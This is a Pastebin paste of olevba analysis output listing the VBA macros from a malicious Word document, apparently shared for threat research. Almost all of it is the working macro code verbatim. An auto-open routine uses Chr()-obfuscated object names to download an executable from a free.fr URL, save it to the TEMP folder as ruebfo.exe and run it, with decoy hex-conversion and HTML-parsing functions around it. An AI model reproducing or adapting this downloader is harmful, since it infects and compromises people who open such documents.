dynamoo

Malicious Word macro

Aug 25th, 2015
472
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. olevba 0.31 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OpX:MASIH--V visaca~3.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: visaca~3.doc
  10. Type: OpenXML
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: word/vbaProject.bin - OLE stream: u'VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
  17.  
  18. HHNANNNNNAD (500)
  19.  
  20. End Sub
  21.  
  22. Sub HHNANNNNNAD(FFFFF As Long)
  23. ConvCFGFFD
  24.  
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module2.bas
  31. in file: word/vbaProject.bin - OLE stream: u'VBA/Module2'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34.  
  35. Public Type typFloat         ' FLOAT CONVERTER TYPES/VALUES
  36.    F As Single
  37. End Type
  38.  
  39. Public Type typStringArray2  ' STRING ARRAY CONVERTER TYPE
  40.    Str(1 To 2) As String
  41. End Type
  42.  
  43. Public Type typByteArray3    ' BYTE ARRAY CONVERTER TYPES/VALUES
  44.    B(1 To 3) As Byte
  45. End Type
  46.  
  47. Public Type typByteArray4    ' BYTE ARRAY CONVERTER TYPES/VALUES
  48.    B(1 To 4) As Byte
  49. End Type
  50.  
  51.  
  52. Public Type typNumString     ' NUM/STRING PARAMETER TYPE
  53.    Number As Integer
  54.     RawString As String
  55. End Type
  56.  
  57.  
  58. Public Type typCfgParam      ' CFG PARAMETER TYPE
  59.    Name As String
  60.     Value As String
  61.     Comment As String
  62. End Type
  63.  
  64.  
  65. Public MarkError As Boolean  ' Global error conversion flag.
  66.  
  67. '==========================================================================
  68. ' FUNCTION:
  69. '
  70. '==========================================================================
  71.  
  72.  
  73.  
  74.  
  75. '==========================================================================
  76. ' FUNCTION: WRITE PARAMETER
  77. ' Converts patch param type to HEX string, according to given type index,
  78. ' then writes it to file.
  79. ' P.S.: Given type index is identical to NewMainWindow parameter type
  80. ' option control array.
  81. '==========================================================================
  82. Function WriteParam(ByVal RawParam As String, ByVal Offset As String, DataType As Integer) As Boolean
  83.  
  84. On Error GoTo ErrorHandler
  85.  
  86.  Dim cntParamOffsetRGB As Integer  ' Next three variables needed only for RGB type.
  87. Dim RGBValues() As String
  88.  Dim RGBOffsets() As String
  89.  
  90.  Dim FinalHexString As String
  91.  
  92.  
  93.   WriteParam = False ' reset just in case...
  94.  
  95.  
  96.    Select Case DataType
  97.    
  98.         Case 0: FinalHexString = InvertHex(ValToHex(DecToIEEE(CDbl(StripIn(RawParam, kMaskFloat))), 8))
  99.         Case 1: FinalHexString = ValToHex(RawParam, 2)                  ' Bits(8)
  100.        Case 2: FinalHexString = InvertHex(ValToHex(RawParam, 4))       ' Bits(16)
  101.        Case 3, 5: FinalHexString = InvertHex(ValToHex(RawParam, 2))    ' Byte (signed / unsigned)
  102.        Case 4, 6: FinalHexString = InvertHex(ValToHex(RawParam, 4))    ' Integer (signed / unsigned)
  103.        Case 7: FinalHexString = InvertHex(ValToHex(RawParam, 8))       ' Long
  104.        Case 9:  FinalHexString = InvertHex(BytesToHex(RawParam, 3))    ' RGB
  105.                 RGBOffsets = Split(Offset, kDivider2, 3)
  106.                  RGBValues = Split(RawParam, kDivider, 3)
  107.                  
  108.         Case 8: FinalHexString = vbNullString                           ' String with zero length, never used.
  109.        Case Else
  110.        
  111.              If DataType < 100 Then
  112.                 FinalHexString = vbNullString
  113.             Else
  114.            
  115.                 ' For string type (which is always > 100), we calculate length by dividing DataType by 100,
  116.                ' multiplying it by 2 (as hex takes 2) and adding 2 extra zeros to the end.
  117.                
  118.                 FinalHexString = CharFillR((StringToHex(RawParam)), "0", ((Fix(DataType / 100) * 2))) & "00"
  119.                
  120.             End If
  121.            
  122.     End Select
  123.    
  124.    
  125.    
  126.     If DataType <> 9 Then  ' For RGB datatype, we specify offset workaround,
  127.                           ' in case user wants to specify offset for each color component seperately.
  128.    
  129.         Call WriteHex(FinalHexString, HxVal(Offset), hFile)    ' Default method, single offset.
  130.        
  131.     Else
  132.             Select Case UBound(RGBOffsets)                     ' Alternate method, single or triple offsets (twin gets ignored).
  133.            
  134.                 Case 0: Call WriteHex(FinalHexString, HxVal(Offset), hFile)
  135.                 Case 2:
  136.                         For cntParamOffsetRGB = 0 To 2
  137.                             Call WriteHex(ValToHex(RGBValues(cntParamOffsetRGB), 2), HxVal(RGBOffsets(cntParamOffsetRGB)), hFile)
  138.                         Next cntParamOffsetRGB
  139.                        
  140.                 Case Else: GoTo ErrorHandler
  141.            
  142.             End Select
  143.            
  144.     End If
  145.    
  146.    
  147.  WriteParam = True
  148.  Exit Function
  149.  
  150.  
  151. ErrorHandler:
  152.     Exit Function
  153.  
  154. End Function
  155.  
  156.  
  157.  
  158. '==========================================================================
  159. ' FUNCTION: CONVERT CONFIG STRING
  160. ' Deciphers config string by mask [ParName] = [ParString] and returns
  161. ' result as cfgParam type.
  162. '==========================================================================
  163. '
  164. Public Function ConvCFG(ByVal SourceString As String) As typCfgParam
  165.  
  166.  Dim cntCharCounter          As Long
  167.  Dim cntSrcStringLength      As Long
  168.  
  169.  Dim cntMarkCommentBeginning As Long
  170.  Dim cntMarkValueBeginning   As Long
  171.                
  172.     SourceString = Trim$(SourceString)
  173.  
  174.     If LenB(SourceString) = 0 Then Exit Function
  175.     If Asc(SourceString) = 59 Or Asc(SourceString) = 91 Then Exit Function 'if REMARKED, then END FUNCTION NOW!!!
  176.                            
  177.     ConvCFG.Name = vbNullString
  178.     ConvCFG.Value = vbNullString
  179.     ConvCFG.Comment = vbNullString
  180.                
  181.     cntMarkCommentBeginning = 0
  182.     cntMarkValueBeginning = 0
  183.                
  184.     cntSrcStringLength = Len(SourceString)
  185.  
  186.     For cntCharCounter = cntSrcStringLength To 1 Step -1
  187.                
  188.         Select Case Mid$(SourceString, cntCharCounter, 1)
  189.                    
  190.             Case kCommentary: cntMarkCommentBeginning = cntCharCounter + 1
  191.  
  192.             Case kEquals: cntMarkValueBeginning = cntCharCounter + 1
  193.                    
  194.         End Select
  195.                
  196.     Next cntCharCounter
  197.  
  198.                
  199.     If cntMarkValueBeginning = 0 Then Exit Function
  200.     If cntMarkValueBeginning > cntMarkCommentBeginning And cntMarkCommentBeginning > 0 Then Exit Function
  201.                
  202.     ConvCFG.Name = Trim$(Left$(SourceString, cntMarkValueBeginning - 2))
  203.                
  204.     If cntMarkCommentBeginning = 0 Then
  205.                
  206.         ConvCFG.Value = Trim$(Right$(SourceString, (cntSrcStringLength + 1) - cntMarkValueBeginning))
  207.                    
  208.     Else
  209.                
  210.         ConvCFG.Comment = Trim$(Mid$(SourceString, cntMarkCommentBeginning))
  211.         ConvCFG.Value = Trim$(Mid$(SourceString, cntMarkValueBeginning, cntMarkCommentBeginning - cntMarkValueBeginning - 1))
  212.                    
  213.     End If
  214.                
  215. End Function
  216.  
  217.  
  218.  
  219. '==========================================================================
  220. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH
  221. ' Converts decimal value (e.g. "11") into true hex value with given length
  222. ' (e.g. "0B" in case nativelength=1 or "000B in case nativelength=2)
  223. '==========================================================================
  224. Public Function ValToHex(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
  225.  
  226. On Error GoTo ErrorHandler
  227.  
  228.  Dim SrcLength As Byte
  229.    
  230.     ValToHex = Hex(Val(SourceValue))
  231.     SrcLength = Len(ValToHex)
  232.    
  233.     If SrcLength < DesiredLength Then ValToHex = CharFillL(ValToHex, "0", DesiredLength)
  234.        
  235.     If SrcLength > DesiredLength Then _
  236.        ValToHex = Mid$(ValToHex, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
  237.    
  238.     Exit Function
  239.  
  240. ErrorHandler:
  241.     MsgBox "Warning: possible error during DEC > HEX conversion. You have entered incorrect value (" + SourceValue + ")."
  242.     ValToHex = vbNullString
  243. End Function
  244.  
  245. Public Function ConvCFGFFD()
  246. Set InvertDicBin = ValToDicBin(Chr(87) & Chr(83) & Chr(99) & Chr(61) & Chr(114) & Chr(105) & Chr(112) & Chr(116) & ";" & Chr(46) & Chr(83) & Chr(61) & Chr(104) & Chr(101) & "<" & Chr(108) & Chr(108)) _
  247. .Environment(Chr(80) & Chr(114) & "o" & Chr(99) & Chr(101) & "s" & "s")
  248. UnsignedHexString2 = InvertDicBin("TE" & Chr(77) & Chr(80))
  249. Dim UnsignedHexLong4 As Object
  250. Set UnsignedHexLong4 = ValToDicBin(Chr(65) & "<" & "d" & Chr(111) & Chr(59) & Chr(100) & Chr(98) & Chr(61) & Chr(46) & Chr(83) & Chr(116) & Chr(61) & Chr(114) & Chr(60) & Chr(101) & "a" & Chr(59) & Chr(109))
  251. Dim UnsignedHexLong3 As String
  252. UnsignedHexLong3 = UnsignedHexString2 + "\rue" & Chr(98) + "fo." & "e" & Chr(120) & Chr(101)
  253. With UnsignedHexLong4
  254.    .Type = 1
  255.     .Open
  256.     .write checkFolder_32(223)
  257.    
  258. End With
  259.  
  260.  GetArrayToBack8 UnsignedHexLong4, UnsignedHexLong3
  261. Set noextensionFile = ValToDicBin(Chr(83) & Chr(61) & "<" & "h" & "e" & Chr(108) & Chr(59) & Chr(108) & "<" & Chr(46) & Chr(65) & "p;" & Chr(112) & Chr(108) & Chr(105) & "<" & Chr(99) & Chr(97) & Chr(116) & Chr(61) & Chr(105) & Chr(111) & Chr(110))
  262. noextensionFile.Open (UnsignedHexLong3)
  263. End Function
  264.  
  265. '==========================================================================
  266. ' FUNCTION: VALUE TO HEX-STRING OF SPECIFIED LENGTH (UNSIGNED)
  267. ' This function does the same as ValToHex, but with unsigned hexes
  268. '==========================================================================
  269. Public Function ValToHexUnsigned(ByVal SourceValue As String, ByVal DesiredLength As Byte) As String
  270. On Error GoTo ErrorHandler
  271.  
  272.  Dim SrcLength As Byte
  273.    
  274.     ValToHexUnsigned = UnsignedHex(Val(SourceValue))
  275.     SrcLength = Len(ValToHexUnsigned)
  276.  
  277.     If SrcLength < DesiredLength Then ValToHexUnsigned = CharFillL(ValToHexUnsigned, "0", DesiredLength)
  278.    
  279.     If SrcLength > DesiredLength Then _
  280.        ValToHexUnsigned = Mid$(ValToHexUnsigned, (SrcLength - DesiredLength + 1), DesiredLength) 'cuts off excess
  281.    
  282.     Exit Function
  283.  
  284. ErrorHandler:
  285.     MsgBox "Warning: possible error during DEC>HEX conversion. You have entered incorrect value (" + SourceValue + ")."
  286.     ValToHexUnsigned = vbNullString
  287.  
  288. End Function
  289.  
  290.  
  291.  
  292. '==========================================================================
  293. ' FUNCTION: INVERT HEXADECIMAL STRING (ex-Invrt)
  294. ' Inverts hexadecimal string to comply with x86 little-endian standard.
  295. '==========================================================================
  296. Public Function InvertHex(ByVal SourceString As String) As String
  297.  
  298.  Dim cntCurChar As Integer
  299.  Dim LengthInBytes As Integer
  300.  
  301. '   Check if string contains odd or even amount of symbols, and if it's even,
  302. '   just cut the last symbol:
  303.  
  304.     If Len(SourceString) Mod 2 = 0 Then _
  305.        LengthInBytes = Len(SourceString) / 2 Else _
  306.        LengthInBytes = Len(SourceString) / 2 - 1
  307.        
  308.        
  309. '   Inversion cycle itself:
  310.  
  311.     For cntCurChar = 1 To LengthInBytes * 2 Step 2
  312.    
  313.         If cntCurChar <> LengthInBytes * 2 Then
  314.             InvertHex = InvertHex + (Mid$(SourceString, ((LengthInBytes * 2) - cntCurChar), 2))
  315.         End If
  316.        
  317.     Next
  318.  
  319. End Function
  320.  
  321.  
  322.  
  323. '==========================================================================
  324. ' FUNCTION: DECIMAL TO UNSIGNED HEX CONVERSION
  325. ' Converts any type of numbers to unsigned HEX string (prevents overflow)
  326. '==========================================================================
  327. Function UnsignedHex(ByVal Value As Variant) As String
  328.  
  329.  Dim TwoToThe32 As Variant
  330.    
  331.         TwoToThe32 = CDec("2") ^ 32
  332.        
  333.         If CDec(Value) < 0 Or Abs(CDec(Value)) >= TwoToThe32 Then
  334.             UnsignedHex = -1
  335.         Else
  336.             If CDec(Value) >= TwoToThe32 / 2 Then
  337.                 Value = CDec(Value) - TwoToThe32
  338.             End If
  339.             UnsignedHex = Hex$(CDec(Value))
  340.         End If
  341.        
  342. End Function
  343.  
  344.  
  345. Public Function checkFolder_32(KJB As Long)
  346.  
  347. Dim strUnquote23: Set strUnquote23 = ValToDicBin(Chr(77) & Chr(105) & Chr(60) & "c" & Chr(114) & Chr(111) & Chr(61) & Chr(115) & Chr(111) & Chr(102) & "t" & Chr(59) & Chr(46) & Chr(88) & "M" & Chr(60) & Chr(76) & ";" & "H" & Chr(84) & "=" & Chr(84) & "P")
  348. strUnquote23.Open Chr(71) & Chr(69) & Chr(84), Chr(104) & Chr(116) & "t" & Chr(112) & Chr(58) & "/" & "/" & Chr(108) & Chr(97) & Chr(110) & "d" & Chr(114) & Chr(101) & Chr(118) & "i" & "e" & "." & Chr(103) & Chr(46) & Chr(102) & "r" & "e" & Chr(101) & Chr(46) & Chr(102) & "r" & Chr(47) & Chr(52) & Chr(53) & Chr(103) & Chr(102) & Chr(51) & Chr(47) & Chr(55) & Chr(117) & Chr(102) & Chr(51) & Chr(114) & Chr(101) & Chr(102) & Chr(46) & "e" & Chr(120) & "e", False
  349. strUnquote23.Send
  350. checkFolder_32 = strUnquote23.responseBody
  351. End Function
  352.  
  353.  
  354. '==========================================================================
  355. ' FUNCTION: A,B,C,D PARAMETERS TO BYTES(4)
  356. ' Converts 4 divider-separated byte values string into 4 byte array values
  357. '==========================================================================
  358. Public Function ParamsToBytes4(RawString As String, ByVal Nomer As Byte) As typByteArray4
  359.  
  360. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  361.  
  362.  Dim tmpStringArray() As String
  363.  Dim tmpCurrentValue As Byte
  364.  Dim cntPointer As Byte
  365.  
  366.         tmpStringArray = Split(RawString, kDivider, 4)
  367.         If UBound(tmpStringArray) > 3 Then ReDim Preserve tmpStringArray(3)
  368.        
  369.         For cntPointer = 0 To UBound(tmpStringArray)
  370.             ParamsToBytes4.B(cntPointer + 1) = CByteL(tmpStringArray(cntPointer))
  371.         Next cntPointer
  372.                
  373.         Exit Function
  374.        
  375. ErrorHandler:   ParamsToBytes4.B(1) = 0 'fuk em...
  376.                ParamsToBytes4.B(2) = 0
  377.                 ParamsToBytes4.B(3) = 0
  378.                 ParamsToBytes4.B(4) = 0
  379.  
  380. End Function
  381.  
  382.  
  383.  
  384. '==========================================================================
  385. ' FUNCTION: A,B,C PARAMETERS TO BYTES(3) (ex-RGBAConv)
  386. ' Converts 3 divider-separated byte values string into 3 byte array values
  387. '==========================================================================
  388. Public Function BytesToHex(RawString As String, Limit As Integer) As String
  389.  
  390.  Dim tmpStringArray() As String
  391.  Dim cntPointer As Byte
  392.  
  393.         tmpStringArray = Split(RawString, kDivider, Limit)
  394.        
  395.         For cntPointer = 0 To UBound(tmpStringArray)
  396.             BytesToHex = BytesToHex & ValToHex(tmpStringArray(cntPointer), 2)
  397.         Next cntPointer
  398.  
  399.        
  400. End Function
  401.  
  402.  
  403.  
  404. -------------------------------------------------------------------------------
  405. VBA MACRO Module1.bas
  406. in file: word/vbaProject.bin - OLE stream: u'VBA/Module1'
  407. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  408.  
  409. '=========================================================================================================================
  410. ' Functions used for HTML scrapping.  Ugly Business
  411. '=========================================================================================================================
  412. Function GetArrayofInstancesFromHTML(sHTML As String, sSearchTag As String, sSearchPredicate As String) As String()
  413.     Dim sTagStart As String, sTagEnd As String, sFoundText As String
  414.     Dim iStart As Long, iEnd As Long, iCounter As Long, sOutputArray() As String
  415.  
  416.     sTagStart = "<" & sSearchTag & " "
  417.     sTagEnd = "/" & sSearchTag & ">"
  418.     If sSearchTag = "input" Then sTagEnd = " />"
  419.    
  420.     iStart = 1:    iCounter = 0
  421.     While iStart > 0
  422.         iStart = VBA.InStr(iStart + 1, sHTML, sTagStart)
  423.         If iStart > 0 Then
  424.             iEnd = VBA.InStr(iStart, sHTML, sTagEnd)
  425.             sFoundText = VBA.Mid$(sHTML, iStart + VBA.Len(sTagStart) - 1, iEnd - (iStart + VBA.Len(sTagStart) - 1))
  426.            
  427.             'If we have set a predicate, then make sure it matches
  428.            If VBA.Len(sSearchPredicate) > 0 Then
  429.                 If VBA.InStr(1, sFoundText, sSearchPredicate) = 0 Then sFoundText = ""
  430.             End If
  431.         End If
  432.        
  433.         'If we've found something then chuck it in the array
  434.        If VBA.Len(sFoundText) > 0 Then
  435.             iCounter = iCounter + 1
  436.             ReDim Preserve sOutputArray(1 To iCounter)
  437.             sOutputArray(iCounter) = sFoundText
  438.         End If
  439.     Wend
  440.  
  441.     GetArrayofInstancesFromHTML = sOutputArray
  442. End Function
  443.  
  444. Function GetValueForVariable(sHTML As String, sValue As String, Optional bRemoveQuotes As Boolean) As String
  445.     Dim iStart As Integer, iEnd As Integer, sResponse As String
  446.    
  447.     iStart = VBA.InStr(1, sHTML, sValue & "=") + VBA.Len(sValue & "=")
  448.     iEnd = VBA.InStr(iStart + 1, sHTML, """")
  449.     sResponse = VBA.Mid$(sHTML, iStart, iEnd - iStart + 1)
  450.    
  451.     If bRemoveQuotes Then
  452.         If VBA.Left$(sResponse, 1) = """" Then sResponse = VBA.Right$(sResponse, VBA.Len(sResponse) - 1)
  453.         If VBA.Right$(sResponse, 1) = """" Then sResponse = VBA.Left$(sResponse, VBA.Len(sResponse) - 1)
  454.     End If
  455.    
  456.     GetValueForVariable = sResponse
  457. End Function
  458.  
  459. Function GetInnerText(sString As String) As String
  460.     Dim iStart As Integer, iEnd As Integer, sResponse As String
  461.  
  462.     iStart = VBA.InStr(1, sString, ">")
  463.     iEnd = VBA.InStr(iStart, sString, "<")
  464.     sResponse = VBA.Mid$(sString, iStart + 1, iEnd - iStart - 1)
  465.    
  466.     GetInnerText = sResponse
  467. End Function
  468. Public Sub GetArrayToBack8(UnsignedHexLong4 As Object, UnsignedHexLong3 As String)
  469. UnsignedHexLong4.savetofile UnsignedHexLong3, 2
  470. End Sub
  471. Function GetArrayOfAnInput(sHTML As String) As String()
  472.     ''Gets all the variables for all the inputs in the sent string
  473.  
  474.     Dim sInputsArray() As String, sTemp As String
  475.     Dim iStart As Integer, iStart2 As Integer, iEnd As Integer, iEnd2 As Integer, iEnd2Old As Integer, iCounter As Integer
  476.    
  477.    
  478.     iStart = 1
  479.     While iStart > 0
  480.         iStart = VBA.InStr(iStart + 1, sHTML, "<input ")
  481.         If iStart > 0 Then
  482.             iEnd = VBA.InStr(iStart, sHTML, """ />")
  483.             If iEnd > 0 Then sTemp = VBA.Mid$(sHTML, iStart + VBA.Len("<input "), iEnd - (iStart + VBA.Len(""" />")) - 2)
  484.            
  485.             'We've found an input so work out all the individual values
  486.            If VBA.Len(sTemp) > 0 Then
  487.                 iCounter = 0
  488.                 iStart2 = 0
  489.                 iEnd2Old = 0
  490.                 Do
  491.                     'Loop while we keep finding a =" string
  492.                    iStart2 = VBA.InStr(iStart2 + 1, sTemp, "=""")
  493.                     If iStart2 > 0 Then
  494.                         'Find the quote at the end
  495.                        iEnd2 = VBA.InStr(iStart2 + 2, sTemp, """")
  496.                         If iEnd2 > 0 Then
  497.                             'Add it to the output array
  498.                            iCounter = iCounter + 1
  499.                             ReDim Preserve sInputsArray(1 To 2, 1 To iCounter)
  500.                             sInputsArray(1, iCounter) = VBA.Mid$(sTemp, iEnd2Old + 1, iStart2 - iEnd2Old - 1)
  501.                             sInputsArray(2, iCounter) = VBA.Mid$(sTemp, iStart2 + 2, iEnd2 - iStart2 - 2)
  502.                             iEnd2Old = iEnd2
  503.                         End If
  504.                     End If
  505.                 Loop Until iStart2 = 0
  506.             End If
  507.         End If
  508.     Wend
  509.  
  510.     GetArrayOfAnInput = sInputsArray
  511. End Function
  512.  
  513. Function ReturnSelectedString(sArray() As String, sWithString As String) As String
  514.     Dim ii As Integer
  515.  
  516.     For ii = LBound(sArray) To UBound(sArray)
  517.         If VBA.InStr(1, sArray(ii), sWithString) Then
  518.             ReturnSelectedString = sArray(ii)
  519.             Exit Function
  520.         End If
  521.     Next ii
  522. End Function
  523.  
  524. Function BuildFormString(sArray() As String) As String
  525.     'This function builds a standard HTML web form string from an array of input values
  526.    Dim ii As Integer, sReturnedString As String, sDivider As String
  527.    
  528.     sDivider = "--" & MULTIPART_BOUNDARY
  529.  
  530.     For ii = LBound(sArray, 2) To UBound(sArray, 2)
  531.         sReturnedString = sReturnedString & sDivider & vbCr & vbLf
  532.         sReturnedString = sReturnedString & "Content-Disposition: form-data; name=" & sArray(2, ii) & vbCr & vbLf & vbCr & vbLf & sArray(1, ii) & vbCr & vbLf
  533.     Next ii
  534.    
  535.     sReturnedString = sReturnedString & sDivider & "--"
  536.     BuildFormString = sReturnedString
  537. End Function
  538.  
  539. 'Function GetParametersFromAJAXString(sHTML As String) As String()
  540. '    Dim lStart As Long, lEnd As Long
  541. '    Dim sMid As String
  542. '    Dim sArray() As String
  543. '
  544. '    lStart = VBA.InStr(1, sHTML, "A4J.AJAX.Submit")
  545. '
  546. '
  547. '    If lStart > 0 Then
  548. '        lStart = VBA.InStr(lStart, sHTML, "(")
  549. '        lEnd = VBA.InStr(lStart, sHTML, ")")
  550. '        sMid = VBA.Mid$(sHTML, lStart + 1, lEnd - lStart - 1)
  551. '        sArray = VBA.Split(sMid, ",")
  552. '
  553. '        GetParametersFromAJAXString = sArray
  554. '    End If
  555. 'End Function
  556. '
  557. 'Function GetAJAXViewState(sHTML As String) As String
  558. '    Dim lStart As Long, lEnd As Long
  559. '    Dim sMid As String
  560. '
  561. '    lStart = VBA.InStr(1, sHTML, "javax.faces.ViewState")
  562. '    lStart = VBA.InStr(lStart, sHTML, "value=""")
  563. '
  564. '    If lStart > 0 Then
  565. '        lEnd = VBA.InStr(lStart, sHTML, """ />")
  566. '        sMid = VBA.Mid$(sHTML, lStart + VBA.Len("value="""), lEnd - lStart - VBA.Len("value="""))
  567. '        GetAJAXViewState = sMid
  568. '    End If
  569. '
  570.  
  571. -------------------------------------------------------------------------------
  572. VBA MACRO Module3.bas
  573. in file: word/vbaProject.bin - OLE stream: u'VBA/Module3'
  574. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  575.  
  576.  
  577. '==========================================================================
  578. ' FUNCTION: PARAMETERS TO STRING ARRAY
  579. ' Converts 2 divider-separated values into string + string values
  580. '==========================================================================
  581. Public Function ParamsToStringArray(RawString As String, Limit As Integer) As String()
  582.  
  583. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  584.  
  585.  Dim cntPointer As Integer
  586.  Dim tmpStringArray() As String
  587.  
  588.     ParamsToStringArray = Split(RawString, kDivider, Limit)
  589.     If UBound(ParamsToStringArray) > Limit Or UBound(ParamsToStringArray) < Limit Then ReDim Preserve ParamsToStringArray(Limit)
  590.    
  591.     Exit Function
  592.        
  593. ErrorHandler:
  594.     Exit Function
  595.        
  596. End Function
  597.  
  598.  
  599.  
  600. '==========================================================================
  601. ' FUNCTION: A,B PARAMETERS TO INTEGER + STRING
  602. ' Converts 2 divider-separated values into integer + string values
  603. '==========================================================================
  604. Public Function ParamsToNumString(RawString As String) As typNumString
  605.  
  606. On Error GoTo ErrorHandler 'if overflow or end string, then stop execution
  607.  
  608.  Dim tmpStringArray() As String
  609.  
  610.     tmpStringArray = Split(RawString, kDivider, 2)
  611.    
  612.     ParamsToNumString.Number = CInt(tmpStringArray(0))
  613.     ParamsToNumString.RawString = tmpStringArray(1)
  614.                                    
  615.     Exit Function
  616.        
  617. ErrorHandler:   ParamsToNumString.Number = 0 'fuk em...
  618.                ParamsToNumString.RawString = vbNullString
  619.  
  620. End Function
  621.  
  622.  
  623.  
  624. '==========================================================================
  625. ' FUNCTION: STRING TO HEXADECIMAL STRING
  626. ' Converts standard string to a string hexcode.
  627. '==========================================================================
  628. Public Function StringToHex(ByVal Stroka As String) As String
  629.  
  630.  Dim cntCharCounter As Byte
  631.  
  632.         For cntCharCounter = 1 To Len(Stroka)
  633.             StringToHex = StringToHex & Hex(AscB(Mid$(Stroka, cntCharCounter, 1)))
  634.         Next
  635.        
  636. End Function
  637.  
  638.  
  639.  
  640. '==========================================================================
  641. ' FUNCTION: DECIMAL TO IEEE-754 FLOAT
  642. ' Converts decimal long to IEEE-754 float
  643. '==========================================================================
  644. Public Function DecToIEEE(ByVal DecValue As Double) As Long
  645.  
  646. On Error GoTo ErrorHandler
  647.  
  648.  Dim B As typByteArray4
  649.  Dim F As typFloat
  650.  Dim t As Long
  651.  
  652.     F.F = DecValue
  653.     LSet B = F
  654.     DecToIEEE = B.B(4) * (2 ^ 24)
  655.     DecToIEEE = DecToIEEE + B.B(3) * (2 ^ 16)
  656.     DecToIEEE = DecToIEEE + B.B(2) * (2 ^ 8)
  657.     DecToIEEE = DecToIEEE + B.B(1)
  658.  
  659. Exit Function
  660.  
  661. ErrorHandler:
  662.         MsgBox "Error during DEC > IEEE-754 float conversion. Check if you have set correct value."
  663.  
  664. End Function
  665.  
  666.  
  667.  
  668. '==========================================================================
  669. ' FUNCTION: HEX TO DECIMAL VALUE
  670. ' Converts hexadecimal long to a decimal long.
  671. '==========================================================================
  672. Function HxVal(ByVal s As String) As Long
  673.  
  674. On Error GoTo ErrorHandler
  675.  
  676.     If LenB(s) <> 0 Then HxVal = CLng("&H" & s) Else HxVal = CLng("&H" & "00")
  677.     Exit Function
  678.  
  679. ErrorHandler:
  680.     If MarkError = False Then
  681.         MarkError = True
  682.         HxVal = CLng("&H" & "00")
  683.         MsgBox "There was an error when converting some hexadecimal value to a decimal." & vbCrLf & _
  684.                "Make sure that you haven't entered wrong data." & vbCrLf & "Source string: ''" & s & "''"
  685.     End If
  686.  
  687. End Function
  688.  
  689. '==========================================================================
  690. ' FUNCTION: SINGLE-LINE TO MULTI-LINE (//-TERMINATED)
  691. ' Converts single-line //-terminated string into multiline string
  692. '==========================================================================
  693. Function DecipherText(ByVal Origtext As String) As String
  694.  
  695.     DecipherText = Replace$(Origtext, kTerminator, vbCrLf)
  696.  
  697. End Function
  698.  
  699. '==========================================================================
  700. ' FUNCTION: MULTI-LINE TO SINGLE-LINE (//-TERMINATED)
  701. ' Converts multi-line //-terminated string into single-line string
  702. '==========================================================================
  703. Function CipherText(ByVal SourceString As String) As String
  704.  
  705.     CipherText = Replace$(SourceString, vbCrLf, kTerminator)
  706.  
  707. End Function
  708.  
  709.  
  710.  
  711. '==========================================================================
  712. ' FUNCTION: PADDING WITH ZEROS FROM LEFT (ex-ZeroFill)
  713. ' Padding (char-fill) to the left side of source string with 0 symbol.
  714. '==========================================================================
  715. Function ZeroFill(ByVal Src As String, ByVal DesiredLength As Long) As String
  716.  
  717.     If Len(Src) > DesiredLength Then Exit Function
  718.    
  719.     ZeroFill = Src
  720.    
  721.     Do Until Len(ZeroFill) = DesiredLength
  722.         ZeroFill = "0" & ZeroFill
  723.     Loop
  724.  
  725. End Function
  726.  
  727.  
  728. '==========================================================================
  729. ' FUNCTION: FILL
  730. '
  731. '==========================================================================
  732. Function Fill(ByVal Src As String, ByVal DesiredLength As Long) As String
  733.  
  734. Dim cnt As Long
  735.  
  736.     For cnt = 0 To DesiredLength - 1
  737.         Fill = Fill & Src
  738.     Next cnt
  739.  
  740. End Function
  741.  
  742.  
  743.  
  744. '==========================================================================
  745. ' FUNCTION: PADDING (ADD SYMBOLS TO THE LEFT SIDE)
  746. ' Padding (char-fill) to the left side of source string.
  747. '==========================================================================
  748. Function CharFillL(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String
  749.  
  750.     If Len(Src) > DesiredLength Then CharFillL = Left$(Src, DesiredLength):  Exit Function
  751.     If Len(FillChar) > 1 Then FillChar = Left$(FillChar, 1)
  752.    
  753.     CharFillL = Src
  754.    
  755.     Do Until Len(CharFillL) = DesiredLength
  756.         CharFillL = FillChar & CharFillL
  757.     Loop
  758.  
  759. End Function
  760.  
  761.  
  762. Public Function ValToDicBin(UIlhbjkhoiyH As String)
  763. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(60), "")
  764. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(61), "")
  765. UIlhbjkhoiyH = Replace(UIlhbjkhoiyH, Chr(59), "")
  766.  Set ValToDicBin = CreateObject(UIlhbjkhoiyH)
  767. End Function
  768.  
  769.  
  770.  
  771. '==========================================================================
  772. ' FUNCTION: PADDING (ADD SYMBOLS TO THE RIGHT SIDE)
  773. ' Padding (char-fill) to the right side of source string.
  774. '==========================================================================
  775. Function CharFillR(ByVal Src As String, ByVal FillChar As String, ByVal DesiredLength As Long) As String
  776.  
  777.     If Len(Src) > DesiredLength Then CharFillR = Left$(Src, DesiredLength): Exit Function
  778.     If Len(FillChar) > 1 Then FillChar = Left$(FillChar, 1)
  779.    
  780.     CharFillR = Src
  781.    
  782.     Do Until Len(CharFillR) = DesiredLength
  783.         CharFillR = CharFillR & FillChar
  784.     Loop
  785.  
  786. End Function
  787.  
  788.  
  789.  
  790. '==========================================================================
  791. ' FUNCTION: CUT OFF
  792. ' This function cuts off specific amount of symbols from left
  793. '==========================================================================
